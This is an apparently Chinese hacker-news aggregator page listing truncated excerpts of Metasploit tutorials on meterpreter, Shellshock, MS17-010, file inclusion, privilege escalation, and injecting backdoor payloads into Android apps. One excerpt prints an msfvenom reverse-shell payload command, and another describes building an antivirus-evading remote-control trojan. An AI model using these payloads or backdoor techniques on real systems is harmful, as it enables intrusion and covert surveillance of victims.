记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

meterpreter必知必会的15个命令

meterpreter是一种高级、隐蔽、多层面的且可动态扩展的payload,可以将反射dll注入到目标主机的内存中,还可以在运行时动态加载脚本和插件来进行后渗透利用。包括提权、转存系统账号、键盘记录、持久后门服务、启用远程桌面等,还有很多其他的扩展。而且,meterpreter shell的整个通信都是默认加密的。因为meterpreter提供的是一个全新的环境,所以我们本文来讲解一些必备的meterpreter命令,带你入门并且逐渐熟悉这款强大的工具。命令1:上传文件到Windows主机简单来说,你可以上传本机的任意文件到远程目标主机中。命令:upload <file> <de
发布时间:2018-10-25 12:20 | 阅读:26650 | 评论:0 | 标签:安全工具 Metasploit Meterpreter

metasploit模块可以利用shellshock漏洞getshell

过去5年中出现的最严重的漏洞之一就是shellshock漏洞,此漏洞允许攻击者通过Unix bash shell远程执行任意代码。此漏洞出现有一段时间了,不过由于连接到web的Unix主机普遍存在,所以这个漏洞还是有很大威胁的,尤其是那些没有打补丁的系统。 shellshock工作原理shellshock首次出现于2014年9月。在漏洞首次披露的几小时内,就有报道发生了攻击,并且在接下来的几天内,有数百万次的攻击和探测来自僵尸网络。bash是一个shell,或者叫解释器,允许在系统上执行命令。bash是Unix系统中的默认shell,因此Linux,macOS和其他的类Unix系统上都有bash。所以shel
发布时间:2018-08-10 12:20 | 阅读:62597 | 评论:0 | 标签:漏洞 getshell Metasploit shellshock

【Web安全】渗透测试介绍|附实例

阅读: 0本篇文章主要讲解一些在web安全领域渗透测试的基础知识点,以普及类信息为主,介绍渗透测试的流程和渗透工具的使用方法例如:sqlmap、metaspolit等,及一些实际应用场景。文章目录渗透测试的定义渗透测试的意义渗透测试的分类黑盒测试白盒测试灰盒测试渗透测试的流程 前期交互信息收集威胁建模漏洞分析渗透攻击后渗透攻击书面报告渗透测试工具的使用sqlmapMetasploit Burp suite渗透测试实战(注意渗透思路、安全加固问题)总结相关阅读渗透测试的定义渗透测试(Penetration Testing)是受信任的第三方通过模拟黑客可能使用到的攻击手段和漏洞挖掘技术对目标网络或目标系统的安全性作出风险评估和脆弱性分析并给出安全加固建议的一个测试过程。渗透测试的意义渗透测试是站在第三者的角度来思考
发布时间:2018-04-24 15:05 | 阅读:156028 | 评论:0 | 标签:威胁通报 Metasploit sqlmap Web安全 渗透测试 渗透测试工具 灰盒测试 白盒测试 黑盒测试

修改Metasploit安卓Payload源码以实现持久化访问

* 本文作者:xiaohuanshu,本文属FreeBuf原创奖励计划,未经许可禁止转载 Metasploit-Payload是广泛使用的安卓后门之一,然而无论是直接使用msfvenom生成的apk文件,还是通过其他手段将payload注入到已有apk中,其连接稳定性都非常差,基本在APP启动的一刹那可以建立连接,如果网络不稳定,中断后不会再次连接。本文将通过直接修改安卓payload源码已实现持久化访问。 分析 Metasploit安卓payload所建立的sessions连接非常不稳定,国内外高人想出了很多解决方案,目前最普遍的方案是在连接建立时,在目标机器上执行以下脚本: #!/bin/bash while true do am start --user 0 -a android.intent.act
发布时间:2017-07-27 11:05 | 阅读:232058 | 评论:0 | 标签:工具 Metasploit

如何手动将Metasploit的Payloads注入到Android应用中

由于大多数Android应用缺乏对二进制文件足够的保护,因此攻击者可以将一些恶意的payload轻松地植入到那些合法的Android应用中。这也是现如今,导致Android机中恶意软件传播迅速的重要原因之一。在我之前写的一篇文章中,我已经为大家演示了如何使用脚本将Metasploit payload注入到android应用中。在本文我将通过手动的方式实现payload的注入。 步骤1 – 生成payload 我们首先使用Metasploit MsfVenom来生成一个APK格式的Meterpreter payload文件。 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.169 LPORT=4444 R &g
发布时间:2017-07-07 17:00 | 阅读:112106 | 评论:0 | 标签:网络安全 Andriod应用 Metasploit payloads 注入 Android

Metasploit实验:制作免杀payload+对任意“外网”主机的远控

*本文只做技术交流之用,技术无罪,希望大家知法懂法,更要守法 我发一个文件,你电脑就被我控制了,我可以拍照摄像下载文件,杀毒软件也不管用!这是怎么做到的呢? 这个问题的实现需要拆分成下面三个模块 内网穿透到外网 制作免杀木马后门 Metasploit控制客户机 环境准备 操作系统 用途 IP地址 需要软件 Kali 制作payload,攻击,映射端口 192.168.1.130 Metasploit Ngrok Win7 制作payload 省略 VC++6.0 Win10 客户机 任意公网地址 无  内网穿透到外网 首先我们需要下载
发布时间:2017-06-14 10:45 | 阅读:139506 | 评论:0 | 标签:工具 系统安全 网络安全 Metasploit 远程控制

如何用Meterpreter实现Nmap

发送钓鱼攻击,目标运行Meterpreter载荷,其系统上有了壳(Shell)。关注我们博客,可能你对后续工作有很多想法,原因很多:端口扫描很乱,许多IDS包设置对此类活动警报迅速,且大多数无需实现既定目标。而假设需在其他系统上找出服务,可有以下备选。 Metasploit配有多个内置扫描仪模块,可在系统配置Meterpreter后使用。只需在Metasploit里添加一个路径,通过路径传输,为扫描模块提供扫描地址、扫描、等待结果。个人认为对其使用上可能存在差距:有时反馈不多,结果也不总一致,当然也有可能是用户错误,本人还是偏爱比提供模块更灵活的方式。 像用Nmap来进行扫描。使用一组工具和特性来迅速将其配置运行。首先,在系统上安装Meterpreter。 安装完毕,添加路由,与目标子网建立传输。 接下来到辅
发布时间:2017-06-08 21:25 | 阅读:77613 | 评论:0 | 标签:工具 metasploit Meterprete nmap

Metasploit Framework详解

Metasploit介绍 几乎每一个玩渗透的人都会接触到Metasploit Framework,简称msf。这是一个渗透测试框架,用ruby语言写的,该框架集成了很多可用的exploit,比如著名的ms08_067等。你可以在这个框架下进行一系列的渗透测试,利用现有的Payload,如Meterpreter等进一步拿取对方的shell。下载的地址在github上面,Git clone该项目到本地进行安装即可。 常用工具介绍 msfconsole 这是启动msf的终端命令,注意因为现在msf默认的数据库是postgresql,所以在启动msf之前需要先启动postgresql数据库。 在终端中输入msfconsole即可启动msf,如果不清楚msfconsole的功能可以在终端中输入 msfconsole -h
发布时间:2017-06-08 21:25 | 阅读:108820 | 评论:0 | 标签:工具 metasploit msf 渗透测试

内网大杀器!Metasploit移植MS17-010漏洞代码模块利用

0x01 引言 2017年4月,网络最为轰动的事件无疑是TheShadowBrokers放出一大批NSA(美国国家安全局)“方程式组织” (Equation Group)使用的极具破坏力的黑客工具,其中包括可以远程攻破全球约70%Windows机器的漏洞利用工具。一夜之间,全世界70%的windows服务器置于危险之中,国内使用windows服务器的高校、国企甚至政府机构也不能幸免。这对互联网无疑造成了一次大地震,因为已经很久没有出现过像MS17-010这种级别的漏洞了,因此就被大家笑语说出了“指哪打哪”这样一个事实。受影响的Windows 版本包括Windows NT、Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windo
发布时间:2017-05-04 16:40 | 阅读:954182 | 评论:2 | 标签:技术 Eternalblue Metasploit 内网安全 漏洞

说说Powersploit在内网渗透中的使用

先说: 第一次写,大家轻点喷,扫扫盲… 内网环境下,我们用metasploit生成一个payload,万一运气稍微好点的,碰到了像360这些东西,我等小白是一脸懵的,这种情况下,就可以想powershell,总不会杀软连这个都要杀吧。 总之powershell + metasploit,双剑合璧,对我们来说在内网渗透中对我们还是有很大的帮助的,可以说是一个巨大的隐藏宝藏! 进入正题 一.Powershell 我们先来说说powershell,PowerShell 是运行在 Windows上实现系统和应用程序管理自动化的命令行脚本环境。你可以把它看成是命令行提示符 cmd.exe 的扩充,或是颠覆。Powershell需要.NET环境的支持,同时支持.NET对象。其可读性,易用性,可以位居当前所有
发布时间:2017-04-14 00:45 | 阅读:115408 | 评论:0 | 标签:工具 网络安全 Metasploit powershell

Metasploit、powershell之Windows错误系统配置漏洞实战提权

*原创作者:shuteer,本文属FreeBuf原创奖励计划,未经许可禁止转载 0×01 引言 我们在获得目标机一个普通的权限时,除了常规提权方法外,还可以通过查找目标主机错误的系统配置和漏洞来获取系统权限。本节所讲的“Trusted Service Paths(可信任服务路径)漏洞”和“系统服务的错误权限配置漏洞”绝对是你值得尝试的一个环节。 0×02 Trusted Service Paths(可信任服务路径)漏洞介绍 “Trusted Service Paths”漏洞是由系统中的“CreateProcess”函数引起的,利用了windows文件路径解析的特性,并涉及了服务路径的文件/文件夹权限,存在缺陷的服务程序利用了属于可执行文件的文件/文件夹权限。如果权限合适,我们可以上传恶意可执行文件。简
发布时间:2017-04-11 22:15 | 阅读:92077 | 评论:0 | 标签:系统安全 Metasploit powershell Windows提权 Windows错误系统配置漏洞 提权 漏洞

Rapid7发布Metasploit攻防模拟实训工具

项目地址 https://github.com/rapid7/metasploit-vulnerability-emulator 简介 许人想要学习安全方面的技能,因为现在这是一个非常热门的领域。网上有很多免费工具可供使用学习,其中最有名的是Metasploit。然而,没有包含特定漏洞的服务器用来测试,很难学会使用Metasploit。 Metasploit Vulnerable Services Emulator可以模拟包含漏洞的服务器,帮助安全从业人员测试Metasploit模块以及完成一些Metasploit的培训 这个模拟器可以运行在Linux(Ubutu),Windows平台,目前已经支持对一百多种漏洞的模拟,以后还将继续增加更多的模块 运行 注意,在shell会话中执行的命令实际上是在目标上执行的
发布时间:2017-03-10 04:30 | 阅读:135188 | 评论:0 | 标签:工具 Kali linux metasploit 渗透测试 漏洞 黑客攻击

Metasploit官方攻防模拟实训工具:Metasploit Vulnerable Services Emulator发布

如何用最好地保护一个系统免受黑客攻击?当然是站在黑客的视角来看待系统的安全问题。昨日Metasploit就以此为出发点,发布了一个漏洞模拟工具——Metasploit Vulnerable Services Emulator。作为一款开源工具,安全人员可以通过它提供的漏洞操作平台来测试渗透测试目标。 想到之前的Metasploitable2和Metasploitable3也有同样的功能,为什么还要特地出一个Metasploit Vulnerable Services Emulator? 开发者Jin Qian在他的博客中这样写道: 使用没有脆弱性测试服务的Metasploit去对抗黑客攻击是有难度的,我们开发的这个模拟器就是为了填补这个空缺。这款工具的框架使得操作者能够更轻松地对渗透测试目标进行漏洞仿真测试。
发布时间:2017-03-08 16:55 | 阅读:79050 | 评论:0 | 标签:工具 Metasploit

本地文件包含漏洞利用技巧

0x00 前言 本文的主要目的是分享在服务器遭受文件包含漏洞时,使用各种技术对Web服务器进行攻击的想法。 我们都知道LFI漏洞允许用户通过在URL中包括一个文件。在本文中,我使用了bWAPP和DVWA两个不同的平台,其中包含文件包含漏洞的演示。通过它我以四种不同的方式执行LFI攻击。 0x01 基本本地文件包含 在浏览器中输入目标IP,并在BWAPP内登录(bee:bug),现在选择bug:remote & local file Inclusion,然后点击hack。 打开具有RFI和LFI漏洞的网页。在下拉列表中选择语言释,单击go按钮时,所选的语言文件将包含在URL中。 执行基本攻击操作。 http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.
发布时间:2017-02-17 18:55 | 阅读:188604 | 评论:0 | 标签:Web安全 bWAPP DVWA metasploit Null byte PHP Input 本地文件包含 漏洞

Metasploit物联网安全渗透测试增加对硬件的支持

开源的Metasploit渗透测试框架新增加了对硬件的支持,使研究人员能够借此研究物联网设备,汽车被选作首个研究用例。   自2009年10月起,安全厂商Rapid7就在引领开源Metasploit渗透测试框架项目,之前的研究以软件为主。然而,Rapid7于2月2日宣布了一项新的Metasploit的扩展功能,使安全研究人员直接链接到硬件从而进行漏洞检测。 新硬件兼容功能已被添加到开源Metasploit框架里,用户可以通过GitHub来获取。此外,Rapid7计划将这一功能打包发布在开源Metasploit社区里。 Metasploit一直具有有线/无线连接设备的功能。新型硬件连接旨在进一步尝试连接特定的硬件测试用例,汽车被选作首个研究用例。 Rapid7交通研究主管克雷格·史密斯解释说,Meta
发布时间:2017-02-07 00:15 | 阅读:106861 | 评论:0 | 标签:技术产品 metasploit 渗透测试 物联网安全 车联网

添加Metasploit-payload到已有的Android项目中

*本文原创作者:xiaohuanshu,本文属FreeBuf原创奖励计划,未经许可禁止转载 metasploit在写这篇文章之前,笔者可以说是对java一窍不通,也从来没有写过什么Android应用,在几天的摸爬滚打中终于实现了最终的目的,就是在已有Apk源码的情况下,用了比较另类的方式,添加metasploit后门。 同时支持java/scala两种语言写的项目,主要是为了给大家提供一些思路,如果哪里写的不准确,欢迎指正。 可能有人说,目前已经有各种各样的工具,比如backdoor-apk能够感染已编译好的Apk文件,但是经过笔者的测试,这种被感染后的文件使用起来不是很稳定,而且apktool本身有缺陷,导致很多apk反编译后无法重新编译。所以,既然有源码,为何要生成apk后再注入后门? p
发布时间:2017-01-19 16:40 | 阅读:113324 | 评论:0 | 标签:系统安全 终端安全 Metasploit Android

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云